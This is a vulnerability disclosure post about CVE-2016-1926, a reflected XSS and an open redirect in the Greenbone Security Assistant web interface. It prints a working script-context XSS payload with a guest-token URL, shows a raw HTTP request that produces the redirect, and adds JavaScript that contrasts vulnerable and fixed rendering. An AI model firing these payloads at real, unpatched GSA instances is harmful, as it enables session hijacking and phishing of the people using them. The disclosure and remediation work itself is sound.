CVE-2016-1926 - XSS in the Greenbone Security Assistant

Recently Tim has been working with the software framework “OpenVAS” (“Open Vulnerability Assessment System”). Since the software is open source, we spent some evenings looking for bugs in its web frontend, the Greenbone Security Assistant (GSA). After some time Sebastian found two bugs, which we reported to the vendor; both are fixed now.

For everybody who does not know what OpenVAS is: OpenVAS is a vulnerability management system. You can run vulnerability scans against different IT systems with it and assess the results. It is also the basis of the Greenbone Security Manager and ships with Kali Linux.

CVE-2016-1926: XSS

If you look at the statistics page, the following AJAX request is sent to the backend:

https://[DOMAIN.tld]/omp?cmd=get_aggregate&xml=0&aggregate_type=nvt&group_column=severity&filt_id=1337&token=guest

The value of aggregate_type was not escaped properly: it is reflected verbatim into a JavaScript string literal inside the page, so it was easy to trigger an XSS in script context. Simply set aggregate_type=nvt"-alert(document.domain)-" to get this reply, in which the closing quote of the payload terminates the literal and alert() is evaluated as part of the expression:

        DataSource ("get_aggregate",
                    {xml:1,
                     aggregate_type:"nvt"-alert(document.domain)-"",
                     group_column:"severity",
                     data_column:"",
                     filter:"",
                     filt_id:"1337"});

    title_total ("Nvts"-alert(document.domain)-" by severity",
                 "count")

Chart (gsa.data_sources ["aggregate-source"],
        gsa.generators ["aggregate-generator"],
        gsa.displays ["aggregate-display"],
        "aggregate-chart",
        "Nvt"-alert(document.domain)-" by severity",
        "/img/charts/severity-bar-chart.png",
        1,
        "",
        "");

Sadly, you need to know the value of the token parameter, which is the session token of a logged-in user. But if guest mode is enabled, as it is in the public demo, token=guest works without any login, so the link can be sent to anyone.
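The following is an added example, not code from GSA or from the original post. It is a simplified stand-in for the template that emits the DataSource(...) call on the statistics page (the function names and the exact text they produce are assumptions) and shows, side by side, why pasting a request parameter into a JavaScript string literal is exploitable and how encoding the value as a proper literal closes the hole. The emitted script is executed with stubbed DataSource/alert/document objects so the effect of the payload from above can be observed without a browser.

```javascript
// Added example (not GSA code): vulnerable vs. hardened rendering of a
// request parameter into script context. Names and output are assumptions.

// Vulnerable rendering: the raw parameter lands between double quotes.
function renderDataSourceVulnerable(params) {
  return 'DataSource ("get_aggregate",\n' +
    '            {xml:1,\n' +
    '             aggregate_type:"' + params.aggregate_type + '",\n' +
    '             group_column:"' + params.group_column + '",\n' +
    '             filt_id:"' + params.filt_id + '"});';
}

// Encode a value as a JavaScript string literal for use inside <script>.
// JSON.stringify escapes quotes, backslashes and control characters. The
// extra replacements keep "<", ">" and "&" out of the literal, so the HTML
// parser (which knows nothing about JS string boundaries) can never see
// "</script>" or "<!--" inside it, and the literal stays safe inside an
// inline event-handler attribute. U+2028/U+2029 are escaped for engines
// older than ES2019, where they may not appear in string literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened rendering: every reflected value goes through jsStringLiteral.
function renderDataSourceHardened(params) {
  return 'DataSource ("get_aggregate",\n' +
    '            {xml:1,\n' +
    '             aggregate_type:' + jsStringLiteral(params.aggregate_type) + ',\n' +
    '             group_column:' + jsStringLiteral(params.group_column) + ',\n' +
    '             filt_id:' + jsStringLiteral(params.filt_id) + '});';
}

// Run the emitted script with stubbed DataSource/alert/document and report
// whether alert() was called. new Function keeps the script out of the
// module scope; it sees only the three stubs it is handed.
function scriptTriggersAlert(script) {
  let fired = false;
  const stubDataSource = () => {};
  const stubAlert = () => { fired = true; };
  const stubDocument = { domain: 'gsa.example' };
  new Function('DataSource', 'alert', 'document', script)(
    stubDataSource, stubAlert, stubDocument);
  return fired;
}

// The request from the post with the payload in aggregate_type
// (constructed input for this example).
const PAYLOAD = 'nvt"-alert(document.domain)-"';
const REQUEST = { aggregate_type: PAYLOAD, group_column: 'severity', filt_id: '1337' };

console.log('vulnerable fires alert:', scriptTriggersAlert(renderDataSourceVulnerable(REQUEST)));
console.log('hardened fires alert:  ', scriptTriggersAlert(renderDataSourceHardened(REQUEST)));
console.log(renderDataSourceHardened(REQUEST));
```

In the vulnerable output the value becomes the expression `"nvt" - alert(document.domain) - ""`, which is syntactically valid JavaScript, so the page loads normally and the alert fires before DataSource is even called. In the hardened output the same payload is the harmless string `"nvt\"-alert(document.domain)-\""`. The same encoder is the right tool wherever GSA reflects a parameter into a `<script>` block; attribute and HTML-body contexts each need their own encoder.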

Another minor bug

The following bug was fixed with the same update. We observed this strange behaviour: a request whose path starts with two slashes,

GET //internetwache.org/? HTTP/1.1
Host: secinfo.greenbone.net
Connection: close

leads to

<a href="//internetwache.org/?r=1&amp;=&amp;token=guest">Login as a guest</a>

All characters of the request path are reflected into the href attribute of the guest-login link. A browser cannot send a request for GET javascript:alert(1) (the request-target has to start with a slash), so this cannot be turned into an XSS. However, a protocol-relative URL (//host/...) does start with a slash, so we can point the link at an arbitrary domain: clicking ‘Login as a guest’ then sends the victim to the other domain, an open redirect.
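An added example, not code from GSA or from the original post: a stand-in for the handler that builds the ‘Login as a guest’ link from the request path (the function shapes, the site origin and the query string are assumptions). It reproduces the reflection and shows a check that only lets a same-origin path through, covering the protocol-relative form from above as well as the backslash variant and an explicit scheme.

```javascript
// Added example (not GSA code): reflecting the request path into href,
// vulnerable vs. hardened. Origin and link format are assumptions.

const SITE_ORIGIN = 'https://gsa.example'; // assumed origin of the GSA host

// Vulnerable: the path of the request-target is pasted into href unchanged,
// so "//internetwache.org/?" yields a protocol-relative link to another host.
function guestLinkVulnerable(requestTarget) {
  const path = requestTarget.split('?')[0];
  return '<a href="' + path + '?r=1&amp;token=guest">Login as a guest</a>';
}

// Resolve the path against our own origin and keep it only if it stays
// there. This rejects "//host/...", "/\host/..." (a backslash counts as a
// slash for http(s) URLs under the WHATWG URL standard) and anything that
// carries a scheme, and returns a normalised path ("/omp/../login" becomes
// "/login"). Anything rejected falls back to "/".
function safeLocalPath(requestTarget) {
  const path = requestTarget.split('?')[0];
  let resolved;
  try {
    resolved = new URL(path, SITE_ORIGIN + '/');
  } catch (err) {
    return '/';
  }
  if (resolved.origin !== SITE_ORIGIN) return '/';
  return resolved.pathname;
}

// Attribute-context escaping for the href value (pathname is already
// percent-encoded, so this is a second line of defence).
function htmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened: only a validated same-origin path reaches the attribute.
function guestLinkHardened(requestTarget) {
  return '<a href="' + htmlAttr(safeLocalPath(requestTarget)) +
    '?r=1&amp;token=guest">Login as a guest</a>';
}

// Constructed request-targets: a normal one, the one from the post, the
// backslash variant and an explicit scheme.
const SAMPLES = ['/omp?cmd=get_tasks', '//internetwache.org/?',
  '/\\internetwache.org/', 'javascript:alert(1)'];
for (const target of SAMPLES) {
  console.log(target, '->', guestLinkVulnerable(target), '|', guestLinkHardened(target));
}
```

Resolving against a fixed origin and comparing origins is more robust than a hand-written prefix check (such as "starts with a single slash"), because the URL parser applies the same normalisation a browser would, including the backslash and scheme cases.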

Details:

  • Product: Greenbone Security Assistant ≥ 6.0.0 and < 6.0.8
  • Vendor: OpenVAS
  • Risk: Low, CVSSv2 1.9 (AV:A/AC:M/Au:M/C:P/I:N/A:N)

The communication with Greenbone GmbH was always pleasant, transparent and to the point.

  • 07.01.2016: XSS discovered and reported to vendor.
  • 08.01.2016, 08:00: Acknowledgement from vendor and info that fix is already in progress.
  • 08.01.2016, 17:30: Fix ready, QA and testing needed
  • 09.01.2016: Update released for Greenbone Security Manager: Advisory GBSA 2016-01
  • 13.01.2016: Update released OpenVAS: Advisory OVSA 20160113
  • 18.01.2016: CVE-2016-1926 assigned by MITRE

The team of internetwache.org